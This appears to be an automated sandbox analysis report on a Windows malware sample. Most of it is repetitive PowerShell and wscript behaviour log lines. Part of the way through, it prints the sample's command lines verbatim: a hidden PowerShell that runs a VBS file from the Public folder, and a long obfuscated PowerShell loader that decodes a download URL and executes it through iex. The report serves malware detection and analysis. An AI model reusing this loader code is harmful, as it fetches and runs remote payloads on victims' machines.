          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6223Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3389Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6625Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3095Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7022Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2627Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -12912720851596678s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep count: 6625 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep count: 3095 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
          Source: wscript.exe, 00000006.00000002.2318825850.000001D766D75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: powershell.exe, 00000000.00000002.2414714485.0000023977170000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3496836394.00000263D8C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_7164.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_2956.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. ColJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'undramatisables ingrid130 linjetegnings crackajack orloven parches syllid idrtsparkerne postoffice169 renlyds landevejenes persecuted postsigmoid ehretia koersel klippehuler boblepaknings regalness kldebons irritative assurancesvigens genecologically149 parulis strygerullerne undramatisables ingrid130 linjetegnings crackajack orloven parches syllid idrtsparkerne postoffice169 renlyds landevejenes persecuted postsigmoid ehretia koersel klippehuler boblepaknings regalness kldebons irritative assurancesvigens genecologically149 parulis strygerullerne';$undsatdeoglyph = 1;function psykopaterne($spleenens){$diastem=$spleenens.length-$undsatdeoglyph;$noiler='substrin';$noiler+='g';for( $undsat=5;$undsat -lt $diastem;$undsat+=6){$undramatisables+=$spleenens.$noiler.invoke( $undsat, $undsatdeoglyph);}$undramatisables;}function responsibly($intraovarian129){ & ($forgyldte) ($intraovarian129);}$skovtrernes=psykopaterne 'nonammhaydoodygtizcadeaiapplal appel mokkarepor/ inds5frak .unde 0talam w gsu(happiwnonauiirresnvivifd,ssocotraktw,oressrabar sphecn fashtnonr, kansa1bes,t0theop.maint0vap r; bunt a.gowmaskei pa.rnl.nia6s.ven4syste;petal visoxafg e6 proc4modst;sanit arm,nrordfovz,nag: ista1uvaer2stopf1sixti.skrav0 re.o)photo ga esgbagsteovergc cr.tkquadrodoggi/thaum2 vald0amt,b1physi0 isse0n.gle1phaet0subco1stigr sweefski.oifin,erm dulek aphfgeneroclangx frem/prale1unsea2,ncul1 caus.p.dio0s.asi ';$hir=psykopaterne 'pipesunonrestmrerepernarun ha-r,ferabiplag o hee ringnsixtytevent ';$orloven=psykopaterne 'databhuncoutnoncotfornupc,mpas prad:kodni/ .ypo/unspiwafmgtwartifwperfe. holgeconfer,wirpph gga-twi.erskulaostiftyspir,aprofiltvrli-uni,pctid.arpi gioreptiw puttnan id. dediichadondeflofindesoacras/ prdiwlenshhhotbr/catapsstempa nagorgulerovaabetchesthbyggerlan,bu vi,kmtrich.adva,jlon.opvermibcamph> he.uhgarant forbtblamapitalisgypso: must/di ci/ methw undewforurw,ipse.prom apar.plslmnimmobedr conswvejgra,rogrd togf.barsecpara ostjdemcitat/anywhw cholhskaks/styres swotasheikrrutebo sub.tvestshs,regr,emicusepalmgela.. stikjniddepsilicblgnag ';$syndsbekendelsens=psykopaterne ' insk>strou ';$forgyldte=psykopaterne 'shoppimeasueetta,xpoo.a ';$grydeskeers='idrtsparkerne';$advoker = psykopaterne 'efteregr,ndc strihsa,liodeta. stad%recidagainspulyksp ud rd ilmna,glertforhaa m,no%renai\.igena.onathlandfohash rsuppontrykithailerl,cie.slid.p av.sitr,kabunexo bildk&super&sig l skyfoesha.ec rabah,ragiounder overftdisbr ';responsibly (psykopaterne 'farin$cyclogkontrlfr.byocity,braakoatematlny.ed: a arbepipto nitrelabourmilieecla,s=stran(,ragecove hmi,terd,husc va.df/deminc.rape do b$outbea,udsedtu.thv.ttitotalsykstab,e outfrc alo)res u ');responsibly (psykopaterne 'kalor$ e ebgap.relknn,soephyrbna,uaahonorlcompu: ,elgcf.rstrbayera plumc,orthkconflabrndsjstu sasvag,cindl.kabiga= co e$.merkobagvar ,rnelfolieosyn ev,ngore overn fluo. col
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'undramatisables ingrid130 linjetegnings crackajack orloven parches syllid idrtsparkerne postoffice169 renlyds landevejenes persecuted postsigmoid ehretia koersel klippehuler boblepaknings regalness kldebons irritative assurancesvigens genecologically149 parulis strygerullerne undramatisables ingrid130 linjetegnings crackajack orloven parches syllid idrtsparkerne postoffice169 renlyds landevejenes persecuted postsigmoid ehretia koersel klippehuler boblepaknings regalness kldebons irritative assurancesvigens genecologically149 parulis strygerullerne';$undsatdeoglyph = 1;function psykopaterne($spleenens){$diastem=$spleenens.length-$undsatdeoglyph;$noiler='substrin';$noiler+='g';for( $undsat=5;$undsat -lt $diastem;$undsat+=6){$undramatisables+=$spleenens.$noiler.invoke( $undsat, $undsatdeoglyph);}$undramatisables;}function responsibly($intraovarian129){ & ($forgyldte) ($intraovarian129);}$skovtrernes=psykopaterne 'nonammhaydoodygtizcadeaiapplal appel mokkarepor/ inds5frak .unde 0talam w gsu(happiwnonauiirresnvivifd,ssocotraktw,oressrabar sphecn fashtnonr, kansa1bes,t0theop.maint0vap r; bunt a.gowmaskei pa.rnl.nia6s.ven4syste;petal visoxafg e6 proc4modst;sanit arm,nrordfovz,nag: ista1uvaer2stopf1sixti.skrav0 re.o)photo ga esgbagsteovergc cr.tkquadrodoggi/thaum2 vald0amt,b1physi0 isse0n.gle1phaet0subco1stigr sweefski.oifin,erm dulek aphfgeneroclangx frem/prale1unsea2,ncul1 caus.p.dio0s.asi ';$hir=psykopaterne 'pipesunonrestmrerepernarun ha-r,ferabiplag o hee ringnsixtytevent ';$orloven=psykopaterne 'databhuncoutnoncotfornupc,mpas prad:kodni/ .ypo/unspiwafmgtwartifwperfe. holgeconfer,wirpph gga-twi.erskulaostiftyspir,aprofiltvrli-uni,pctid.arpi gioreptiw puttnan id. dediichadondeflofindesoacras/ prdiwlenshhhotbr/catapsstempa nagorgulerovaabetchesthbyggerlan,bu vi,kmtrich.adva,jlon.opvermibcamph> he.uhgarant forbtblamapitalisgypso: must/di ci/ methw undewforurw,ipse.prom apar.plslmnimmobedr conswvejgra,rogrd togf.barsecpara ostjdemcitat/anywhw cholhskaks/styres swotasheikrrutebo sub.tvestshs,regr,emicusepalmgela.. stikjniddepsilicblgnag ';$syndsbekendelsens=psykopaterne ' insk>strou ';$forgyldte=psykopaterne 'shoppimeasueetta,xpoo.a ';$grydeskeers='idrtsparkerne';$advoker = psykopaterne 'efteregr,ndc strihsa,liodeta. stad%recidagainspulyksp ud rd ilmna,glertforhaa m,no%renai\.igena.onathlandfohash rsuppontrykithailerl,cie.slid.p av.sitr,kabunexo bildk&super&sig l skyfoesha.ec rabah,ragiounder overftdisbr ';responsibly (psykopaterne 'farin$cyclogkontrlfr.byocity,braakoatematlny.ed: a arbepipto nitrelabourmilieecla,s=stran(,ragecove hmi,terd,husc va.df/deminc.rape do b$outbea,udsedtu.thv.ttitotalsykstab,e outfrc alo)res u ');responsibly (psykopaterne 'kalor$ e ebgap.relknn,soephyrbna,uaahonorlcompu: ,elgcf.rstrbayera plumc,orthkconflabrndsjstu sasvag,cindl.kabiga= co e$.merkobagvar ,rnelfolieosyn ev,ngore overn fluo. colJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
